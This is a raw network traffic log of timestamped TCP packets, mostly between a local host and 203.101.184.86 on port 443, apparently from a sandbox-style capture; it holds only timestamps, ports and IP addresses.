                                                                                                                                          Sep 30, 2024 18:58:14.376847982 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.376867056 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.376877069 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.376913071 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.376913071 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.376923084 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.376957893 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.388243914 CEST49731443192.168.2.5104.21.92.189
                                                                                                                                          Sep 30, 2024 18:58:14.457783937 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.457943916 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.457967043 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.458180904 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.583719015 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.583789110 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.583837032 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.583894014 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.584196091 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.584255934 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.584403992 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.584464073 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.584501028 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.584785938 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.584873915 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.584884882 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585449934 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585489035 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585520029 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.585532904 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585546970 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585546970 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.585609913 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.585617065 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585855961 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.585890055 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585928917 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585944891 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.585951090 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585983038 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.585983038 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.585983038 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.585993052 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.586047888 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.586673975 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.586745024 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.586751938 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.586762905 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.586828947 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.586836100 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.586872101 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.587630987 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.587686062 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.587692022 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.587735891 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.587774992 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.587809086 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.587853909 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.587862015 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.587887049 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.588500023 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.588526964 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.588570118 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.588572025 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.588581085 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.588607073 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.588607073 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.589288950 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.589359999 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.589368105 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.589418888 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.670794964 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.670851946 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.670891047 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.670917988 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.670917988 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.670923948 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.670933962 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.670944929 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.670984983 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.671035051 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.671088934 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.671112061 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.671122074 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.671154022 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.671184063 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.671366930 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.671418905 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.797504902 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.797563076 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.797596931 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.797597885 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.797617912 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.797632933 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.797671080 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.797671080 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.797682047 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.797725916 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.797780991 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798057079 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.798063040 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798224926 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798243046 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.798248053 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798377991 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798389912 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.798418999 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.798424006 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798599958 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798669100 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.798669100 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.798675060 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798686981 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798723936 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.798748016 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.798753977 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.799021959 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.799304008 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.799406052 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.799474001 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.799514055 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.799551964 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.799583912 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.799583912 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.799590111 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.799652100 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.799683094 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.799786091 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.799850941 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802391052 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802453041 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802463055 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802473068 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802529097 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802535057 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802546978 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802577019 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802578926 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802628040 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802633047 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802668095 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802710056 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802710056 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802717924 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802759886 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802761078 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802774906 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.802800894 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.802999973 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803060055 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.803066015 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803076029 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803101063 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803144932 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.803152084 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803158998 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803404093 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.803559065 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803639889 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803684950 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.803684950 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.803692102 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803726912 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.803735971 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.803952932 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.804270029 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.804299116 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.804358006 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.804358006 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.804363966 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.804476976 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.804569006 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.804606915 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.804613113 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.804655075 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.804657936 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.804678917 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.804718018 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.804718018 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.804724932 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.805177927 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.805223942 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.805265903 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.805265903 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.805274010 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.805512905 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.805556059 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.805562019 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.806653023 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.886024952 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.886074066 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.886106014 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.886111021 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.886126041 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.886145115 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.886178970 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.886181116 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.886181116 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.886189938 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.886214018 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.886257887 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.886964083 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.887048006 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.887101889 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.887173891 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.887492895 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.887634993 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.887676001 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.887676001 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.887682915 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.887739897 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.888237000 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888304949 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888322115 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.888328075 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888364077 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.888364077 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.888385057 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888434887 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.888439894 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888490915 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.888494968 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888504028 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888616085 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.888621092 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888639927 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888720989 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888732910 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.888737917 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.888766050 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.891021013 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.891112089 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.891118050 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.891150951 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.891195059 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.891227961 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.891232014 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:14.891237020 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:14.891633987 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.012655973 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.012712002 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.012752056 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.012840033 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.012860060 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.012876987 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.012907028 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.012932062 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.013371944 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.013437033 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.013470888 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.013474941 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.013480902 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.013492107 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.013598919 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.013609886 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.013619900 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.013648033 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.013680935 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.013688087 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.013696909 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.013856888 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.014468908 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.014580011 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.014614105 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.014656067 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.014661074 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.014676094 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.014713049 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.014717102 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.014811993 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.014818907 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.014985085 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.015439034 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.015522003 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.015526056 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.015536070 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.015605927 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.015762091 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.015795946 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.015811920 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.015815973 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.015842915 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.015856028 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.015856028 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.015861988 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.015961885 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.016412973 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.016485929 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.016491890 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.016609907 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.016638994 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.016663074 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.016666889 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.016700983 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.016700983 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.016724110 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.016782045 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.016788960 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.016872883 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.017344952 CEST44349727203.101.184.86192.168.2.5
                                                                                                                                          Sep 30, 2024 18:58:15.017405033 CEST49727443192.168.2.5203.101.184.86
                                                                                                                                          Sep 30, 2024 18:58:15.017416000 CEST44349727203.101.184.86192.168.2.5
